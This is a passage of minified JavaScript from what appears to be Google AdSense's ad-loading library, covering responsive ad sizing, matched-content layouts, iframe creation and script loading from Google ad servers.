e=a.a.height();c.google_ad_resize||(c.google_ad_width=d,c.google_ad_height=e,c.google_ad_format=a.a.ea(b),c.google_responsive_auto_format=a.sa,null!=a.f&&(c.armr=a.f),c.google_ad_resizable=!0,c.google_override_format=1,c.google_loader_features_used=128,!0===a.b&&(c.gfwrnh=a.a.height()+"px"));null!=a.Aa&&(c.gfwroml=a.Aa);null!=a.Ba&&(c.gfwromr=a.Ba);null!=a.i&&(c.gfwroh=a.i);null!=a.s&&(c.gfwrow=a.s);null!=a.Ca&&(c.gfwroz=a.Ca);null!=a.ta&&(c.gml=a.ta);null!=a.xa&&(c.gmr=a.xa);null!=a.ka&&(c.gzi=a.ka);b=Jc();b=Mc(b)||b;Bh(b.location,"google_responsive_slot_debug")&&(c.ds="outline:thick dashed "+(d&&e?!0!==a.b||!0!==a.h?"#ffa500":"#0f0":"#f00")+" !important;");!Bh(b.location,"google_responsive_dummy_ad")||!Oa([1,2,3,4,5,6,7,8],a.sa)&&1!==a.f||c.google_ad_resize||2===a.f||(a=JSON.stringify({googMsgType:"adpnt",key_value:[{key:"qid",value:"DUMMY_AD"}]}),c.dash="<"+Ai+">window.top.postMessage('"+a+"', '*');\n </"+Ai+'>\n <div id="dummyAd" style="width:'+d+"px;height:"+e+'px;\n background:#ddd;border:3px solid #f00;box-sizing:border-box;\n color:#000;">\n <p>Requested size:'+d+"x"+e+"</p>\n <p>Rendered size:"+d+"x"+e+"</p>\n </div>")};/* Copyright 2019 The AMP HTML Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS-IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ var Di={},Ei=(Di.image_stacked=1/1.91,Di.image_sidebyside=1/3.82,Di.mobile_banner_image_sidebyside=1/3.82,Di.pub_control_image_stacked=1/1.91,Di.pub_control_image_sidebyside=1/3.82,Di.pub_control_image_card_stacked=1/1.91,Di.pub_control_image_card_sidebyside=1/3.74,Di.pub_control_text=0,Di.pub_control_text_card=0,Di),Fi={},Gi=(Fi.image_stacked=80,Fi.image_sidebyside=0,Fi.mobile_banner_image_sidebyside=0,Fi.pub_control_image_stacked=80,Fi.pub_control_image_sidebyside=0,Fi.pub_control_image_card_stacked=85,Fi.pub_control_image_card_sidebyside=0,Fi.pub_control_text=80,Fi.pub_control_text_card=80,Fi),Hi={},Ii=(Hi.pub_control_image_stacked=100,Hi.pub_control_image_sidebyside=200,Hi.pub_control_image_card_stacked=150,Hi.pub_control_image_card_sidebyside=250,Hi.pub_control_text=100,Hi.pub_control_text_card=150,Hi);function Ji(a){var b=0;a.C&&b++;a.u&&b++;a.v&&b++;if(3>b)return{A:"Tags data-matched-content-ui-type, data-matched-content-columns-num and data-matched-content-rows-num should be set together."};b=a.C.split(",");var c=a.v.split(",");a=a.u.split(",");if(b.length!==c.length||b.length!==a.length)return{A:'Lengths of parameters data-matched-content-ui-type, data-matched-content-columns-num and data-matched-content-rows-num must match. Example: \n data-matched-content-rows-num="4,2"\ndata-matched-content-columns-num="1,6"\ndata-matched-content-ui-type="image_stacked,image_card_sidebyside"'};if(2<b.length)return{A:"The parameter length of attribute data-matched-content-ui-type, data-matched-content-columns-num and data-matched-content-rows-num is too long. At most 2 parameters for each attribute are needed: one for mobile and one for desktop, while you are providing "+(b.length+' parameters. Example: \n data-matched-content-rows-num="4,2"\ndata-matched-content-columns-num="1,6"\ndata-matched-content-ui-type="image_stacked,image_card_sidebyside".')};for(var d=[],e=[],f=0;f<b.length;f++){var g=Number(c[f]);if(isNaN(g)||0===g)return{A:"Wrong value '"+c[f]+"' for data-matched-content-rows-num."};d.push(g);g=Number(a[f]);if(isNaN(g)||0===g)return{A:"Wrong value '"+a[f]+"' for data-matched-content-columns-num."};e.push(g)}return{v:d,u:e,ra:b}}function Ki(a){return 1200<=a?{width:1200,height:600}:850<=a?{width:a,height:Math.floor(.5*a)}:550<=a?{width:a,height:Math.floor(.6*a)}:468<=a?{width:a,height:Math.floor(.7*a)}:{width:a,height:Math.floor(3.44*a)}};var Li=["google_content_recommendation_ui_type","google_content_recommendation_columns_num","google_content_recommendation_rows_num"];function Mi(a,b){R.call(this,a,b)}ka(Mi,R);Mi.prototype.M=function(a){return Math.min(1200,Math.max(this.minWidth(),Math.round(a)))};function Ni(a,b){Oi(a,b);if("pedestal"==b.google_content_recommendation_ui_type)return new Bi(9,new Mi(a,Math.floor(a*b.google_phwr)));var c=Vb();468>a?c?(c=a-8-8,c=Math.floor(c/1.91+70)+Math.floor(11*(c*Ei.mobile_banner_image_sidebyside+Gi.mobile_banner_image_sidebyside)+96),a={O:a,N:c,u:1,v:12,C:"mobile_banner_image_sidebyside"}):(a=Ki(a),a={O:a.width,N:a.height,u:1,v:13,C:"image_sidebyside"}):(a=Ki(a),a={O:a.width,N:a.height,u:4,v:2,C:"image_stacked"});Pi(b,a);return new Bi(9,new Mi(a.O,a.N))}function Qi(a,b){Oi(a,b);var c=Ji({v:b.google_content_recommendation_rows_num,u:b.google_content_recommendation_columns_num,C:b.google_content_recommendation_ui_type});if(c.A)a={O:0,N:0,u:0,v:0,C:"image_stacked",A:c.A};else{var d=2===c.ra.length&&468<=a?1:0;var e=c.ra[d];e=0===e.indexOf("pub_control_")?e:"pub_control_"+e;var f=Ii[e];for(var g=c.u[d];a/g<f&&1<g;)g--;f=g;c=c.v[d];d=Math.floor(((a-8*f-8)/f*Ei[e]+Gi[e])*c+8*c+8);a=1500<a?{width:0,height:0,ia:"Calculated slot width is too large: "+a}:1500<d?{width:0,height:0,ia:"Calculated slot height is too large: "+d}:{width:a,height:d};a=a.ia?{O:0,N:0,u:0,v:0,C:e,A:a.ia}:{O:a.width,N:a.height,u:f,v:c,C:e}}if(a.A)throw new L(a.A);Pi(b,a);return new Bi(9,new Mi(a.O,a.N))}function Oi(a,b){if(0>=a)throw new L("Invalid responsive width from Matched Content slot "+b.google_ad_slot+": "+a+". Please ensure to put this Matched Content slot into a non-zero width div container.");}function Pi(a,b){a.google_content_recommendation_ui_type=b.C;a.google_content_recommendation_columns_num=b.u;a.google_content_recommendation_rows_num=b.v};function Ri(a,b){R.call(this,a,b)}ka(Ri,R);Ri.prototype.M=function(){return this.minWidth()};Ri.prototype.Z=function(a,b,c,d){var e=this.M(b);Ag(a,d,d.parentElement,b,e,c);if(!c.google_ad_resize){d.style.height=this.height()+"px";b=J(a,Of.c)||"ca-pub-9118350542306317"===c.google_ad_client;d=yf(197)?!J(a,Of.c):J(a,Of.B);e=J(a,P.c);var f=J(a,P.T)||J(a,P.L)||J(a,P.K)||J(a,P.I)||J(a,P.J);if(J(a,Of.c)||J(a,Of.B)||e||f)c.ovlp=!0;b?c.rpe=!1:d&&(c.rpe=!0);if(J(a,Jf.c)||J(a,Jf.R)||J(a,Jf.P))c.ovlp=!0}};function Si(a){return function(b){for(var c=a.length-1;0<=c;--c)if(!a[c](b))return!1;return!0}}function Ti(a,b,c){for(var d=a.length,e=null,f=0;f<d;++f){var g=a[f];if(b(g)){if(!c||c(g))return g;null===e&&(e=g)}}return e};var V=[new U(970,90,2),new U(728,90,2),new U(468,60,2),new U(336,280,1),new U(320,100,2),new U(320,50,2),new U(300,600,4),new U(300,250,1),new U(250,250,1),new U(234,60,2),new U(200,200,1),new U(180,150,1),new U(160,600,4),new U(125,125,1),new U(120,600,4),new U(120,240,4),new U(120,120,1,!0)],Ui=[V[6],V[12],V[3],V[0],V[7],V[14],V[1],V[8],V[10],V[4],V[15],V[2],V[11],V[5],V[13],V[9],V[16]];function Vi(a,b,c,d,e){"false"!=e.google_full_width_responsive||c.location&&"#gfwrffwaifhp"==c.location.hash?"autorelaxed"==b&&(e.google_full_width_responsive||J(c,hg.g))||Wi(b)||e.google_ad_resize?(b=wg(a,c,d,e),c=!0!==b?{l:a,m:b}:{l:Q(c)||a,m:!0}):c={l:a,m:2}:c={l:a,m:1};b=c.m;return!0!==b?{l:a,m:b}:d.parentElement?{l:c.l,m:b}:{l:a,m:b}}function Xi(a,b,c,d,e){var f=be(247,function(){return Vi(a,b,c,d,e)}),g=f.l;f=f.m;var h=!0===f,k=F(d.style.width),m=F(d.style.height),n=Yi(g,b,c,d,e,h);g=n.H;h=n.G;var u=n.D,w=n.F,z=n.ha;n=n.Na;var H=Zi(b,z),E,G=(E=Bg(d,c,"marginLeft",F))?E+"px":"",sb=(E=Bg(d,c,"marginRight",F))?E+"px":"";E=Bg(d,c,"zIndex")||"";return new Bi(H,g,z,null,n,f,h,u,w,G,sb,m,k,E)}function Wi(a){return"auto"==a||/^((^|,) *(horizontal|vertical|rectangle) *)+$/.test(a)}function Yi(a,b,c,d,e,f){b="auto"==b?.25>=a/Math.min(1200,Q(c))?4:3:ug(b);var g=!1,h=!1,k=$i(c),m=488>Q(c);if(k&&m||!k&&Vb()){var n=tg(d,c);h=Eg(d,c);g=!h&&n;h=h&&n}m=(g||k?Ui:V).slice(0);var u=488>Q(c),w=[Cg(a),Dg(u,c,d,h),zi(b)];null!=e.google_max_responsive_height&&w.push(Gg(e.google_max_responsive_height));k||w.push(aj(u));u=[function(H){return!H.Ma}];if(g||h)g=g&&!k?Ig(c,d):Jg(c,d),u.push(Gg(g));var z=Ti(m,Si(w),Si(u));if(!z)throw new L("No slot size for availableWidth="+a);g=be(248,function(){var H;a:if(f){if(e.gfwrnh&&(H=F(e.gfwrnh))){H={H:new Ri(a,H),G:!0,D:!1,F:!1};break a}if($i(c)||"true"==e.google_full_width_responsive||!Eg(d,c)||e.google_resizing_allowed){H=!1;var E=og(c).clientHeight,G=rg(d,c),sb=c.google_lpabyc,bg=Hg(d,c);if(bg&&2<bg&&!c.google_bfabyc&&(!sb||G-sb>E)&&(E=.9*og(c).clientHeight,G=Math.min(E,bj(c,d,e)),E&&G==E)){G=c.google_pbfabyc;H=!G;if(J(c,Jf.R)||J(c,Jf.P)){c.google_bfabyc=rg(d,c)+E;H={H:new Ri(a,Math.floor(E)),G:!0,D:!0,F:!0};break a}G||(c.google_pbfabyc=rg(d,c)+E)}E=a/1.2;G=Math.min(E,bj(c,d,e));if(G<.5*E||100>G)G=E;if(J(c,P.L)||J(c,P.K)||J(c,P.I)||J(c,P.J))G*=1.3;H={H:new Ri(a,Math.floor(G)),G:G<E?102:!0,D:!1,F:H}}else H={H:new Ri(a,z.height()),G:101,D:!1,F:!1}}else H={H:z,G:100,D:!1,F:!1};return H});return{H:g.H,G:g.G,D:g.D,F:g.F,ha:b,Na:n}}function bj(a,b,c){return c.google_resizing_allowed||"true"==c.google_full_width_responsive?Infinity:Ig(a,b)}function Zi(a,b){if("auto"==a)return 1;switch(b){case 2:return 2;case 1:return 3;case 4:return 4;case 3:return 5;case 6:return 6;case 5:return 7;case 7:return 8}throw Error("bad mask");}function aj(a){return function(b){return!(320==b.minWidth()&&(a&&50==b.height()||!a&&100==b.height()))}}function $i(a){return yf(197)?!J(a,Of.c):J(a,Of.B)};var cj={"image-top":function(a){return 600>=a?284+.414*(a-250):429},"image-middle":function(a){return 500>=a?196-.13*(a-250):164+.2*(a-500)},"image-side":function(a){return 500>=a?205-.28*(a-250):134+.21*(a-500)},"text-only":function(a){return 500>=a?187-.228*(a-250):130},"in-article":function(a){return 420>=a?a/1.2:460>=a?a/1.91+130:800>=a?a/4:200}};function dj(a,b){R.call(this,a,b)}ka(dj,R);dj.prototype.M=function(){return Math.min(1200,this.minWidth())};function ej(a,b,c,d,e){var f=e.google_ad_layout||"image-top";if("in-article"==f&&"false"!=e.google_full_width_responsive){var g=vg(b,c,a,.2,e);if(!0!==g)e.gfwrnwer=g;else if(g=Q(b)){e.google_full_width_responsive_allowed=!0;var h=c.parentElement;if(h){b:for(var k=c,m=0;100>m&&k.parentElement;++m){for(var n=k.parentElement.childNodes,u=0;u<n.length;++u){var w=n[u];if(w!=k&&yg(b,w))break b}k=k.parentElement;k.style.width="100%";k.style.height="auto"}Ag(b,c,h,a,g,e);a=g}}}if(250>a)throw new L("Fluid responsive ads must be at least 250px wide: availableWidth="+a);a=Math.min(1200,Math.floor(a));if(d&&"in-article"!=f){f=Math.ceil(d);if(50>f)throw new L("Fluid responsive ads must be at least 50px tall: height="+f);return new Bi(11,new R(a,f))}if("in-article"!=f&&(d=e.google_ad_layout_key)){f=""+d;b=Math.pow(10,3);if(e=(c=f.match(/([+-][0-9a-z]+)/g))&&c.length){d=[];for(g=0;g<e;g++)d.push(parseInt(c[g],36)/b);b=d}else b=null;if(!b)throw new L("Invalid data-ad-layout-key value: "+f);f=(a+-725)/1E3;c=0;e=1;d=b.length;for(g=0;g<d;g++)c+=b[g]*e,e*=f;f=Math.ceil(1E3*c- -725+10);if(isNaN(f))throw new L("Invalid height: height="+f);if(50>f)throw new L("Fluid responsive ads must be at least 50px tall: height="+f);if(1200<f)throw new L("Fluid responsive ads must be at most 1200px tall: height="+f);return new Bi(11,new R(a,f))}if(J(b,lg.c)||J(b,lg.aa)||J(b,lg.ba))e.ovlp=!0;e=cj[f];if(!e)throw new L("Invalid data-ad-layout value: "+f);d=J(b,lg.ba)||J(b,lg.aa);c=Eg(c,b);b=Q(b);b="in-article"===f&&!c&&a===b&&d?Math.ceil(1.25*e(a)):Math.ceil(e(a));return new Bi(11,"in-article"==f?new dj(a,b):new R(a,b))};function fj(a,b){R.call(this,a,b)}ka(fj,R);fj.prototype.M=function(){return this.minWidth()};fj.prototype.ea=function(a){return R.prototype.ea.call(this,a)+"_0ads_al"};var gj=[new fj(728,15),new fj(468,15),new fj(200,90),new fj(180,90),new fj(160,90),new fj(120,90)];function hj(a,b,c){var d=250,e=90;d=void 0===d?130:d;e=void 0===e?30:e;var f=Ti(gj,Cg(a));if(!f)throw new L("No link unit size for width="+a+"px");a=Math.min(a,1200);f=f.height();b=Math.max(f,b);d=(new Bi(10,new fj(a,Math.min(b,15==f?e:d)))).a;b=d.minWidth();d=d.height();15<=c&&(d=c);return new Bi(10,new fj(b,d))}function ij(a,b,c,d){if("false"==d.google_full_width_responsive)return d.google_full_width_responsive_allowed=!1,d.gfwrnwer=1,a;var e=wg(a,b,c,d);if(!0!==e)return d.google_full_width_responsive_allowed=!1,d.gfwrnwer=e,a;e=Q(b);if(!e)return a;d.google_full_width_responsive_allowed=!0;Ag(b,c,c.parentElement,a,e,d);return e};function jj(a,b,c,d,e){var f;(f=Q(b))?488>Q(b)?b.innerHeight>=b.innerWidth?(e.google_full_width_responsive_allowed=!0,Ag(b,c,c.parentElement,a,f,e),f={l:f,m:!0}):f={l:a,m:5}:f={l:a,m:4}:f={l:a,m:10};var g=f;f=g.l;g=g.m;if(!0!==g||a==f)return new Bi(12,new R(a,d),null,null,!0,g,100);a=Yi(f,"auto",b,c,e,!0);return new Bi(1,a.H,a.ha,2,!0,g,a.G,a.D,a.F)};function kj(a){var b=a.google_ad_format;if("autorelaxed"==b){a:{if("pedestal"!=a.google_content_recommendation_ui_type){b=ba(Li);for(var c=b.next();!c.done;c=b.next())if(null!=a[c.value]){a=!0;break a}}a=!1}return a?9:5}if(Wi(b))return 1;if("link"==b)return 4;if("fluid"==b)return 8}function lj(a,b,c,d,e){e=b.offsetWidth||(c.google_ad_resize||(void 0===e?!1:e))&&Bg(b,d,"width",F)||c.google_ad_width||0;!J(d,Qf.g)||5!==a&&9!==a||(c.google_ad_format="auto",c.google_ad_slot="",a=1);var f=(f=mj(a,e,b,c,d))?f:Xi(e,c.google_ad_format,d,b,c);f.a.Z(d,e,c,b);Ci(f,e,c);1!=a&&(a=f.a.height(),b.style.height=a+"px")}function mj(a,b,c,d,e){var f=d.google_ad_height||Bg(c,e,"height",F);switch(a){case 5:return a=be(247,function(){return Vi(b,d.google_ad_format,e,c,d)}),f=a.l,a=a.m,!0===a&&b!=f&&Ag(e,c,c.parentElement,b,f,d),!0===a?d.google_full_width_responsive_allowed=!0:(d.google_full_width_responsive_allowed=!1,d.gfwrnwer=a),nj(e)&&(d.ovlp=!0),Ni(f,d);case 9:return Qi(b,d);case 4:return a=ij(b,e,c,d),hj(a,Jg(e,c),f);case 8:return ej(b,e,c,f,d);case 10:return jj(b,e,c,f,d)}}function nj(a){return J(a,hg.c)||J(a,hg.g)};function W(a){this.h=[];this.b=a||window;this.a=0;this.f=null;this.i=0}var oj;l=W.prototype;l.Ia=function(a,b){0!=this.a||0!=this.h.length||b&&b!=window?this.pa(a,b):(this.a=2,this.wa(new pj(a,window)))};l.pa=function(a,b){this.h.push(new pj(a,b||this.b));qj(this)};l.Ra=function(a){this.a=1;if(a){var b=ce(188,Fa(this.va,this,!0));this.f=this.b.setTimeout(b,a)}};l.va=function(a){a&&++this.i;1==this.a&&(null!=this.f&&(this.b.clearTimeout(this.f),this.f=null),this.a=0);qj(this)};l.Ya=function(){return!(!window||!Array)};l.La=function(){return this.i};function qj(a){var b=ce(189,Fa(a.Za,a));a.b.setTimeout(b,0)}l.Za=function(){if(0==this.a&&this.h.length){var a=this.h.shift();this.a=2;var b=ce(190,Fa(this.wa,this,a));a.a.setTimeout(b,0);qj(this)}};l.wa=function(a){this.a=0;a.b()};function rj(a){try{return a.sz()}catch(b){return!1}}function sj(a){return!!a&&("object"===typeof a||"function"===typeof a)&&rj(a)&&Ec(a.nq)&&Ec(a.nqa)&&Ec(a.al)&&Ec(a.rl)}function tj(){if(oj&&rj(oj))return oj;var a=Bf(),b=a.google_jobrunner;return sj(b)?oj=b:a.google_jobrunner=oj=new W(a)}function uj(a,b){tj().nq(a,b)}function vj(a,b){tj().nqa(a,b)}W.prototype.nq=W.prototype.Ia;W.prototype.nqa=W.prototype.pa;W.prototype.al=W.prototype.Ra;W.prototype.rl=W.prototype.va;W.prototype.sz=W.prototype.Ya;W.prototype.tc=W.prototype.La;function pj(a,b){this.b=a;this.a=b};function wj(a,b){var c=Mc(b);if(c){c=Q(c);var d=$b(a,b)||{},e=d.direction;if("0px"===d.width&&"none"!=d.cssFloat)return-1;if("ltr"===e&&c)return Math.floor(Math.min(1200,c-a.getBoundingClientRect().left));if("rtl"===e&&c)return a=b.document.body.getBoundingClientRect().right-a.getBoundingClientRect().right,Math.floor(Math.min(1200,c-a-Math.floor((c-b.document.body.clientWidth)/2)))}return-1};function xj(a){var b=this;this.a=a;a.google_iframe_oncopy||(a.google_iframe_oncopy={handlers:{},upd:function(c,d){var e=yj("rx",c),f=Number;a:{if(c&&(c=c.match("dt=([^&]+)"))&&2==c.length){c=c[1];break a}c=""}f=f(c);f=(new Date).getTime()-f;e=e.replace(/&dtd=(\d+|-?M)/,"&dtd="+(1E5<=f?"M":0<=f?f:"-M"));b.set(d,e);return e}});this.b=a.google_iframe_oncopy}xj.prototype.set=function(a,b){var c=this;this.b.handlers[a]=b;this.a.addEventListener&&this.a.addEventListener("load",function(){var d=c.a.document.getElementById(a);try{var e=d.contentWindow.document;if(d.onload&&e&&(!e.body||!e.body.firstChild))d.onload()}catch(f){}},!1)};function yj(a,b){var c=new RegExp("\\b"+a+"=(\\d+)"),d=c.exec(b);d&&(b=b.replace(c,a+"="+(+d[1]+1||1)));return b}var zj,Aj="var i=this.id,s=window.google_iframe_oncopy,H=s&&s.handlers,h=H&&H[i],w=this.contentWindow,d;try{d=w.document}catch(e){}if(h&&d&&(!d.body||!d.body.firstChild)){if(h.call){setTimeout(h,0)}else if(h.match){try{h=s.upd(h,i)}catch(e){}w.location.replace(h)}}";var X=Aj;/[\x00&<>"']/.test(X)&&(-1!=X.indexOf("&")&&(X=X.replace(Za,"&")),-1!=X.indexOf("<")&&(X=X.replace($a,"<")),-1!=X.indexOf(">")&&(X=X.replace(ab,">")),-1!=X.indexOf('"')&&(X=X.replace(bb,""")),-1!=X.indexOf("'")&&(X=X.replace(cb,"'")),-1!=X.indexOf("\x00")&&(X=X.replace(db,"�")));Aj=X;zj=Aj;var Bj={},Cj=(Bj.google_ad_modifications=!0,Bj.google_analytics_domain_name=!0,Bj.google_analytics_uacct=!0,Bj.google_pause_ad_requests=!0,Bj);var Dj=/^\.google\.(com?\.)?[a-z]{2,3}$/,Ej=/\.(cn|com\.bi|do|sl|ba|by|ma|am)$/;function Fj(a){return Dj.test(a)&&!Ej.test(a)}var Gj=p;function Hj(a){a="https://adservice"+(a+"/adsid/integrator.js");var b=["domain="+encodeURIComponent(p.location.hostname)];Y[3]>=+new Date&&b.push("adsid="+encodeURIComponent(Y[1]));return a+"?"+b.join("&")}var Y,Z;function Ij(){Gj=p;Y=Gj.googleToken=Gj.googleToken||{};var a=+new Date;Y[1]&&Y[3]>a&&0<Y[2]||(Y[1]="",Y[2]=-1,Y[3]=-1,Y[4]="",Y[6]="");Z=Gj.googleIMState=Gj.googleIMState||{};Fj(Z[1])||(Z[1]=".google.com");ya(Z[5])||(Z[5]=[]);"boolean"==typeof Z[6]||(Z[6]=!1);ya(Z[7])||(Z[7]=[]);pa(Z[8])||(Z[8]=0)}var Jj={fa:function(){return 0<Z[8]},Ua:function(){Z[8]++},Va:function(){0<Z[8]&&Z[8]--},Wa:function(){Z[8]=0},ab:function(){return!1},Ka:function(){return Z[5]},Ga:function(a){try{a()}catch(b){p.setTimeout(function(){throw b;},0)}},Ta:function(){if(!Jj.fa()){var a=p.document,b=function(e){e=Hj(e);a:{try{var f=qa();break a}catch(g){}f=void 0}Dh(a,e,f);f=a.createElement("script");f.type="text/javascript";f.onerror=function(){return p.processGoogleToken({},2)};e=Tb(e);vb(f,e);try{(a.head||a.body||a.documentElement).appendChild(f),Jj.Ua()}catch(g){}},c=Z[1];b(c);".google.com"!=c&&b(".google.com");b={};var d=(b.newToken="FBT",b);p.setTimeout(function(){return p.processGoogleToken(d,1)},1E3)}}};function Kj(){p.processGoogleToken=p.processGoogleToken||function(a,b){var c=a;c=void 0===c?{}:c;b=void 0===b?0:b;a=c.newToken||"";var d="NT"==a,e=parseInt(c.freshLifetimeSecs||"",10),f=parseInt(c.validLifetimeSecs||"",10),g=c["1p_jar"]||"";c=c.pucrd||"";Ij();1==b?Jj.Wa():Jj.Va();var h=Gj.googleToken=Gj.googleToken||{},k=0==b&&a&&q(a)&&!d&&pa(e)&&0<e&&pa(f)&&0<f&&q(g);d=d&&!Jj.fa()&&(!(Y[3]>=+new Date)||"NT"==Y[1]);var m=!(Y[3]>=+new Date)&&0!=b;if(k||d||m)d=+new Date,e=d+1E3*e,f=d+1E3*f,1E-5>Math.random()&&sc("https://pagead2.googlesyndication.com/pagead/gen_204?id=imerr&err="+b,null),h[5]=b,h[1]=a,h[2]=e,h[3]=f,h[4]=g,h[6]=c,Ij();if(k||!Jj.fa()){b=Jj.Ka();for(a=0;a<b.length;a++)Jj.Ga(b[a]);b.length=0}};Ij();Y[3]>=+new Date&&Y[2]>=+new Date||Jj.Ta()};var Lj=zb("script");function Mj(){D.google_sa_impl&&!D.document.getElementById("google_shimpl")&&(D.google_sa_queue=null,D.google_sl_win=null,D.google_sa_impl=null);if(!D.google_sa_queue){D.google_sa_queue=[];D.google_sl_win=D;D.google_process_slots=function(){return Nj(D)};var a=Oj();Dh(D.document,a);J(D,"20199335")||!qb()||t("iPhone")&&!t("iPod")&&!t("iPad")||t("iPad")||t("iPod")?Zb(D.document,a).id="google_shimpl":(a=Rb(document,"IFRAME"),a.id="google_shimpl",a.style.display="none",D.document.documentElement.appendChild(a),xi(D,"google_shimpl","<!doctype html><html><body><"+(Lj+">google_sl_win=window.parent;google_async_iframe_id='google_shimpl';</")+(Lj+">")+Pj()+"</body></html>"),a.contentWindow.document.close())}}var Nj=ce(215,function(a){var b=a.google_sa_queue,c=b.shift();a.google_sa_impl||de("shimpl",{t:"no_fn"});"function"==wa(c)&&be(216,c);b.length&&a.setTimeout(function(){return Nj(a)},0)});function Qj(a,b,c){a.google_sa_queue=a.google_sa_queue||[];a.google_sa_impl?c(b):a.google_sa_queue.push(b)}function Pj(){var a=Oj();return"<"+Lj+' src="'+a+'"></'+Lj+">"}function Oj(){var a="/show_ads_impl.js";a=void 0===a?"/show_ads_impl.js":a;a:{if(xc)try{var b=D.google_cafe_host||D.top.google_cafe_host;if(b){var c=b;break a}}catch(d){}c=Ac()}return jf(c,["/pagead/js/",wc(),"/r20190131",a,""].join(""),"https")}function Rj(a,b,c,d){return function(){var e=!1;d&&tj().al(3E4);try{xi(a,b,c),e=!0}catch(g){var f=Bf().google_jobrunner;sj(f)&&f.rl()}e&&(e=yj("google_async_rrc",c),(new xj(a)).set(b,Rj(a,b,e,!1)))}}function Sj(a){if(!yi)a:{for(var b=[p.top],c=[],d=0,e;e=b[d++];){c.push(e);try{if(e.frames)for(var f=e.frames.length,g=0;g<f&&1024>b.length;++g)b.push(e.frames[g])}catch(k){}}for(b=0;b<c.length;b++)try{var h=c[b].frames.google_esf;if(h){yi=h;break a}}catch(k){}yi=null}if(!yi){if(/[^a-z0-9-]/.test(a))return null;c=Rb(document,"IFRAME");c.id="google_esf";c.name="google_esf";h=hf(vc("","googleads.g.doubleclick.net"),["/pagead/html/",wc(),"/r20190131/zrt_lookup.html#",encodeURIComponent("")].join(""));c.src=h;c.style.display="none";c.setAttribute("data-ad-client",Fh(a));return c}return null}function Tj(a,b,c){Uj(a,b,c,function(d,e,f){d=d.document;for(var g=e.id,h=0;!g||d.getElementById(g+"_anchor");)g="aswift_"+h++;e.id=g;e.name=g;g=Number(f.google_ad_width||0);h=Number(f.google_ad_height||0);var k=f.ds||"";k&&(k+=k.endsWith(";")?"":";");var m="";if(!f.google_enable_single_iframe){m=["<iframe"];for(n in e)e.hasOwnProperty(n)&&m.push(n+"="+e[n]);m.push('style="left:0;position:absolute;top:0;border:0px;width:'+(g+"px;height:"+(h+'px;"')));m.push("></iframe>");m=m.join(" ")}var n=e.id;var u="";u=void 0===u?"":u;g="border:none;height:"+h+"px;margin:0;padding:0;position:relative;visibility:visible;width:"+(g+"px;background-color:transparent;");n=['<ins id="'+(n+'_expand"'),' style="display:inline-table;'+g+(void 0===k?"":k)+'"',u?' data-ad-slot="'+u+'">':">",'<ins id="'+(n+'_anchor" style="display:block;')+g+'">',m,"</ins></ins>"].join("");16==f.google_reactive_ad_format?(f=d.createElement("div"),f.innerHTML=n,c.appendChild(f.firstChild)):c.innerHTML=n;return e.id})}function Uj(a,b,c,d){var e=b.google_ad_width,f=b.google_ad_height;J(a,jg.g)?(fe(!0),b.google_enable_single_iframe=!0):J(a,jg.c)&&fe(!1);var g={};null!=e&&(g.width=e&&'"'+e+'"');null!=f&&(g.height=f&&'"'+f+'"');g.frameborder='"0"';g.marginwidth='"0"';g.marginheight='"0"';g.vspace='"0"';g.hspace='"0"';g.allowtransparency='"true"';g.scrolling='"no"';g.allowfullscreen='"true"';g.onload='"'+zj+'"';d=d(a,g,b);Vj(a,c,b);(c=Sj(b.google_ad_client))&&a.document.documentElement.appendChild(c);c=Ha;e=(new Date).getTime();b.google_lrv=wc();b.google_async_iframe_id=d;b.google_unique_id=Gc(a);b.google_start_time=c;b.google_bpp=e>c?e-c:1;b.google_async_rrc=0;a.google_sv_map=a.google_sv_map||{};a.google_sv_map[d]=b;a.google_t12n_vars=vf;if(b.google_enable_single_iframe){var h={pubWin:a,iframeWin:null,vars:b};Qj(a,function(){a.google_sa_impl(h)},a.document.getElementById(d+"_anchor")?uj:vj)}else Qj(a,Rj(a,d,["<!doctype html><html><body>","<"+Lj+">","google_sl_win=window.parent;google_iframe_start_time=new Date().getTime();",'google_async_iframe_id="'+d+'";',"</"+Lj+">","<"+Lj+">window.parent.google_sa_impl({iframeWin: window, pubWin: window.parent, vars: window.parent['google_sv_map']['"+(d+"']});</")+Lj+">","</body></html>"].join(""),!0),a.document.getElementById(d)?uj:vj)}function Vj(a,b,c){var d=c.google_ad_output,e=c.google_ad_format,f=c.google_ad_width||0,g=c.google_ad_height||0;e||"html"!=d&&null!=d||(e=f+"x"+g);d=!c.google_ad_slot||c.google_override_format||!Pb[c.google_ad_width+"x"+c.google_ad_height]&&"aa"==c.google_loader_used;e&&d?e=e.toLowerCase():e="";c.google_ad_format=e;if(!pa(c.google_reactive_sra_index)||!c.google_ad_unit_key){e=[c.google_ad_slot,c.google_orig_ad_format||c.google_ad_format,c.google_ad_type,c.google_orig_ad_width||c.google_ad_width,c.google_orig_ad_height||c.google_ad_height];d=[];f=0;for(g=b;g&&25>f;g=g.parentNode,++f)9===g.nodeType?d.push(""):d.push(g.id);(d=d.join())&&e.push(d);c.google_ad_unit_key=fc(e.join(":")).toString();var h=void 0===h?!1:h;e=[];for(d=0;b&&25>d;++d){f="";void 0!==h&&h||(f=(f=9!==b.nodeType&&b.id)?"/"+f:"");a:{if(b&&b.nodeName&&b.parentElement){g=b.nodeName.toString().toLowerCase();for(var k=b.parentElement.childNodes,m=0,n=0;n<k.length;++n){var u=k[n];if(u.nodeName&&u.nodeName.toString().toLowerCase()===g){if(b===u){g="."+m;break a}++m}}}g=""}e.push((b.nodeName&&b.nodeName.toString().toLowerCase())+f+g);b=b.parentElement}h=e.join()+":";b=[];if(a)try{var w=a.parent;for(e=0;w&&w!==a&&25>e;++e){var z=w.frames;for(d=0;d<z.length;++d)if(a===z[d]){b.push(d);break}a=w;w=a.parent}}catch(H){}c.google_ad_dom_fingerprint=fc(h+b.join()).toString()}};function Wj(a,b){a=a.attributes;for(var c=a.length,d=0;d<c;d++){var e=a[d];if(/data-/.test(e.name)){var f=Ya(e.name.replace("data-matched-content","google_content_recommendation").replace("data","google").replace(/-/g,"_"));if(!b.hasOwnProperty(f)){e=e.value;var 